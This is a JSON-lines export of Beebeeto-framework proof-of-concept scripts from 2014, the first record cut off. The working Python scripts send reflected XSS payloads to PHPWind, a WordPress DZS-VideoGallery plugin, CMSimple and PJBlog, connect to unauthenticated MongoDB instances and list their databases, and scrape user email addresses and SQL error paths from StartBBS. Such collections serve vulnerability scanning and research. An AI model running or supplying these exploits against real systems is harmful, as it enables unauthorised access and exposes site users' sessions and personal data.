args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "PHPWind", "id": "poc-2014-0201", "layer4_protocol": null}
{"create_date": "2014-12-11 01:02:34", "name": "phpwind 9.0 \u8c9d\u5854 \u53cd\u5c04XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0200',\r\n 'name': 'phpwind 9.0 \u8c9d\u5854 \u53cd\u5c04XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aindex.php',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2012-012163',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?m=1%22%3E%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E%26c%3Dforum'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n try:\r\n content = urllib2.urlopen(req).read()\r\n except urllib2.URLError, e:\r\n content = e.read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n return args\r\n\r\n exploit = 
verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aindex.php", "app_name": "PHPWind", "id": "poc-2014-0200", "layer4_protocol": null}
{"create_date": "2014-12-11 00:54:22", "name": "phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,flash xss,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0199',\r\n 'name': 'phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind', \r\n 'vul_version': ['9.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', 'flash xss', 'php'],\r\n 'desc': 'http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2013-017731',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"3a1c6cc728dddc258091a601f28a9c12\"\r\n file_path = \"/res/js/dev/util_libs/swfupload/Flash/swfupload.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n\r\n if md5_value in flash_md5:\r\n args['success'] = 
True\r\n args['poc_ret']['xss_url'] = verify_url + '?movieName=\"])}catch(e){alert(1)}//'\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://packetstormsecurity.com/files/118059/SWF-Upload-Cross-Site-Scripting.html", "app_name": "PHPWind", "id": "poc-2014-0199", "layer4_protocol": null}
{"create_date": "2014-12-10 13:35:45", "name": "WordPress DZS-VideoGallery /ajax.php XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "WordPress DZS-VideoGallerye,xss\u6f0f\u6d1e,/wp-content/plugins/dzs-videogallery/ajax.php, php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0195',\r\n 'name': 'WordPress DZS-VideoGallery /ajax.php XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress DZS-VideoGallery',\r\n 'vul_version': [''],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['WordPress DZS-VideoGallerye', 'xss\u6f0f\u6d1e', '/wp-content/plugins/dzs-videogallery/ajax.php', 'php'],\r\n 'desc': '''\r\n WordPress\u662fWordPress\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u5957\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u8be5\u5e73\u53f0\u652f\u6301\u5728PHP\u548cMySQL\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u4e2a\u4eba\u535a\u5ba2\u7f51\u7ad9\u3002\r\n DZS-VideoGallery\u662f\u5176\u4e2d\u7684\u4e00\u4e2aDZS\u89c6\u9891\u5e93\u63d2\u4ef6\u3002 \r\n WordPress DZS-VideoGallery\u63d2\u4ef6\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\u3002\r\n 
\u5f53\u7528\u6237\u6d4f\u89c8\u88ab\u5f71\u54cd\u7684\u7f51\u7ad9\u65f6\uff0c\u5176\u6d4f\u89c8\u5668\u5c06\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb\u8005\u7a83\u53d6\u57fa\u4e8ecookie\u7684\u8eab\u4efd\u8ba4\u8bc1\u5e76\u53d1\u8d77\u5176\u5b83\u653b\u51fb\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-61532',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/wp-content/plugins/dzs-videogallery/ajax.php?ajax=true&height=400&\"\r\n \"width=610&type=vimeo&source=%22%2F%3E%3Cscript%3Ealert%28bb2%29%3C%2Fscript%3E\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "WordPress\u662fWordPress\u8f6f\u4ef6\u57fa\u91d1\u4f1a\u7684\u4e00\u5957\u4f7f\u7528PHP\u8bed\u8a00\u5f00\u53d1\u7684\u535a\u5ba2\u5e73\u53f0\uff0c\u8be5\u5e73\u53f0\u652f\u6301\u5728PHP\u548cMySQL\u7684\u670d\u52a1\u5668\u4e0a\u67b6\u8bbe\u4e2a\u4eba\u535a\u5ba2\u7f51\u7ad9\u3002\r\nDZS-VideoGallery\u662f\u5176\u4e2d\u7684\u4e00\u4e2aDZS\u89c6\u9891\u5e93\u63d2\u4ef6\u3002 \r\nWordPress 
DZS-VideoGallery\u63d2\u4ef6\u4e2d\u5b58\u5728\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8e\u7a0b\u5e8f\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u7528\u6237\u63d0\u4ea4\u7684\u8f93\u5165\u3002\r\n\u5f53\u7528\u6237\u6d4f\u89c8\u88ab\u5f71\u54cd\u7684\u7f51\u7ad9\u65f6\uff0c\u5176\u6d4f\u89c8\u5668\u5c06\u6267\u884c\u653b\u51fb\u8005\u63d0\u4f9b\u7684\u4efb\u610f\u811a\u672c\u4ee3\u7801\uff0c\u8fd9\u53ef\u80fd\u5bfc\u81f4\u653b\u51fb\u8005\u7a83\u53d6\u57fa\u4e8ecookie\u7684\u8eab\u4efd\u8ba4\u8bc1\u5e76\u53d1\u8d77\u5176\u5b83\u653b\u51fb\u3002", "app_name": "WordPress", "id": "poc-2014-0195", "layer4_protocol": null}
{"create_date": "2014-12-10 12:38:52", "name": "Mongodb \u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Mongodb\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e,\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e,27017/28017\u7aef\u53e3", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport pymongo\r\nimport urllib2\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0194',\r\n 'name': 'Mongodb \u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2014-12-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [28017],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Mongodb',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Mongodb\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e', '\u9ed8\u8ba4\u7a7a\u53e3\u4ee4\u672a\u6388\u6743\u8bbf\u95ee\u6f0f\u6d1e', '27017/28017\u7aef\u53e3'],\r\n 'desc': 'mongodb\u542f\u52a8\u65f6\u672a\u52a0 --auth\u9009\u9879\uff0c\u5bfc\u81f4\u65e0\u9700\u8ba4\u8bc1\u5373\u53ef\u8fde\u63a5mongodb\u6570\u636e\u5e93\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n ip_addr = urlparse.urlparse(verify_url).netloc\r\n if args['options']['verbose']:\r\n print '[*] Connect mongodb: ' + ip_addr + ':27017'\r\n 
try:\r\n conn = pymongo.MongoClient(ip_addr, 27017, socketTimeoutMS=3000)\r\n dbname = conn.database_names()\r\n if dbname:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = ip_addr + ':27017'\r\n args['poc_ret']['database_names'] = dbname\r\n except Exception, e:\r\n if args['options']['verbose']:\r\n print str(e)\r\n args['success'] = False\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "mongodb\u542f\u52a8\u65f6\u672a\u52a0 --auth\u9009\u9879\uff0c\u5bfc\u81f4\u65e0\u9700\u8ba4\u8bc1\u5373\u53ef\u8fde\u63a5mongodb\u6570\u636e\u5e93\uff0c\u4ece\u800c\u5bfc\u81f4\u4e00\u7cfb\u5217\u5b89\u5168\u95ee\u9898\u3002", "app_name": "MongoDB", "id": "poc-2014-0194", "layer4_protocol": null}
{"create_date": "2014-12-10 00:48:32", "name": "StartBBS v1.1.5 \u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "StartBBS\u4fe1\u606f\u6cc4\u9732,\u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0192',\r\n 'name': 'StartBBS v1.1.5 \u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-12-10',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StartBBS',\r\n 'vul_version': ['1.1.5'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['StartBBS\u4fe1\u606f\u6cc4\u9732', '\u6709\u8da3\u7684\u6cc4\u9732\u4efb\u610f\u7528\u6237\u90ae\u7bb1\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n \u4ee3\u7801 /themes/default/userinfo.php\u5728\u7b2c86\u884c\u6709\u8fd9\u6837\u4e00\u53e5\uff1a\r\n <div class='inner'><p><?php echo $introduction?></p><!--<p>\r\n \u8054\u7cfb\u65b9\u5f0f: <a href=\"mailto:<?php echo $email?>\" class=\"external mail\">\r\n <?php echo $email?></a></p>--></div>\r\n\r\n \u8f93\u51fa\u4e86\u7528\u6237\u7684\u90ae\u7bb1\uff0c\u4f46\u662f\u7ed9\u6ce8\u91ca\u6389\u4e86\uff0c\u6240\u4ee5\u7528\u6237\u9875\u9762\u770b\u4e0d\u5230\u3002\u3002\u67e5\u770b\u6e90\u4ee3\u7801\u5373\u53ef\r\n ''',\r\n 'references': 
['http://www.wooyun.org/bugs/wooyun-2014-051696',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n # GET User\r\n url = args['options']['target']\r\n index_content = urllib2.urlopen(url).read()\r\n regex_user = re.compile(r'(/user/info/\\d+)\" class=\"dark startbbs profile_link\"', re.IGNORECASE)\r\n regex_mail = re.compile(r\"\\b[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,4}\\b\", re.IGNORECASE)\r\n user_list = regex_user.findall(index_content)\r\n # Main\r\n if user_list:\r\n user_url = []\r\n args['poc_ret']['user_email'] = []\r\n # GET User homepage\r\n for i in user_list[-3:]:\r\n url_tmp = url + i\r\n user_url.append(url_tmp)\r\n # GET Email\r\n for i in user_url:\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + i\r\n try:\r\n content = urllib2.urlopen(i).read()\r\n except:\r\n continue\r\n mail_list = regex_mail.findall(content)\r\n # Success or False\r\n if mail_list:\r\n for mail in mail_list:\r\n args['success'] = True\r\n args['options']['target'] = user_url\r\n args['poc_ret']['user_email'].append(mail)\r\n if not args['poc_ret']['user_email']:\r\n args['success'] = False\r\n args['poc_ret'].pop('user_email')\r\n return args\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u4ee3\u7801 /themes/default/userinfo.php\u5728\u7b2c86\u884c\u6709\u8fd9\u6837\u4e00\u53e5\uff1a\r\n <div class='inner'><p><?php echo $introduction?></p><!--<p>\r\n \u8054\u7cfb\u65b9\u5f0f: <a href=\"mailto:<?php echo $email?>\" class=\"external mail\">\r\n <?php echo $email?></a></p>--></div>\r\n\r\n\u8f93\u51fa\u4e86\u7528\u6237\u7684\u90ae\u7bb1\uff0c\u4f46\u662f\u7ed9\u6ce8\u91ca\u6389\u4e86\uff0c\u6240\u4ee5\u7528\u6237\u9875\u9762\u770b\u4e0d\u5230\u3002\u3002\u67e5\u770b\u6e90\u4ee3\u7801\u5373\u53ef", "app_name": "Startbbs", "id": "poc-2014-0192", "layer4_protocol": null}
{"create_date": "2014-12-09 23:53:01", "name": "StartBBS v1.1.3 \u7269\u7406\u8def\u5f84\u6cc4\u6f0f POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 1, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "StartBBS\u4fe1\u606f\u6cc4\u9732,StartBBS\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0191',\r\n 'name': 'StartBBS v1.1.3 \u7269\u7406\u8def\u5f84\u6cc4\u6f0f POC',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StartBBS',\r\n 'vul_version': ['1.1.3'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['StartBBS\u4fe1\u606f\u6cc4\u9732', 'StartBBS\u7206\u8def\u5f84', 'php'],\r\n 'desc': 'http://startbbs/index.php/home/getmore/w.jsp \u968f\u610f\u6784\u9020\u4e00\u4e2a.jsp\u7206\u51fa\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-045780',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target'] + '/index.php/home/getmore/w.jsp'\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'Filename:' in content and 'You have an error in your SQL syntax' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == 
'__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://startbbs/index.php/home/getmore/w.jsp \u968f\u610f\u6784\u9020\u4e00\u4e2a.jsp\u7206\u51fa\u6570\u636e\u5e93\u67e5\u8be2\u8bed\u53e5", "app_name": "Startbbs", "id": "poc-2014-0191", "layer4_protocol": null}
{"create_date": "2014-12-09 23:25:29", "name": "CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "CMSimple\u6f0f\u6d1e,xss\u6f0f\u6d1e,/whizzywig/wb.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0190',\r\n 'name': 'CMSimple 3.54 /whizzywig/wb.php XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'CMSimple',\r\n 'vul_version': ['3.54'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['CMSimple\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/whizzywig/wb.php', 'php'],\r\n 'desc': '''\r\n \u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n \u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002\r\n ''',\r\n 'references': ['http://sebug.net/vuldb/ssvid-61903',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27bb2%27%29%3C/script%3E'\r\n verify_url = args['options']['target'] + 
payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aGetarticle.CMSimple\u4e0d\u6b63\u786e\u8fc7\u6ee4\u4f20\u9012\u7ed9\"/whizzywig/wb.php\"\u811a\u672c\u7684\"d\" HTTP GET\u53c2\u6570\u6570\u636e\uff0c\r\n\u5141\u8bb8\u653b\u51fb\u8005\u6784\u5efa\u6076\u610fURI\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u83b7\u5f97\u654f\u611fCookie\uff0c\u52ab\u6301\u4f1a\u8bdd\u6216\u5728\u5ba2\u6237\u7aef\u4e0a\u8fdb\u884c\u6076\u610f\u64cd\u4f5c\u3002", "app_name": "CMSimple", "id": "poc-2014-0190", "layer4_protocol": null}
{"create_date": "2014-12-09 23:04:31", "name": "PJBlog 3.0.6.170 /Action.asp XSS\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "PJBlog\u6f0f\u6d1e,xss\u6f0f\u6d1e,/Action.asp,asp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0188',\r\n 'name': 'PJBlog 3.0.6.170 /Action.asp XSS\u6f0f\u6d1e POC',\r\n 'author': '\u6211\u53ea\u4f1a\u6253\u8fde\u8fde\u770b',\r\n 'create_date': '2014-12-09',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PJBlog',\r\n 'vul_version': ['3.0.6.170'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['PJBlog\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', '/Action.asp', 'asp'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1aAction.asp',\r\n 'references': ['http://sebug.net/vuldb/ssvid-11236',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/Action.asp?action=type1&mainurl=xxx\">%3Cscript%3Ealert%28%22bb2%22%29%3C%2Fscript%3E'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<script>alert(\"bb2\")</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n \r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = 
MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1aAction.asp", "app_name": "PJblog", "id": "poc-2014-0188", "layer4_protocol": null}
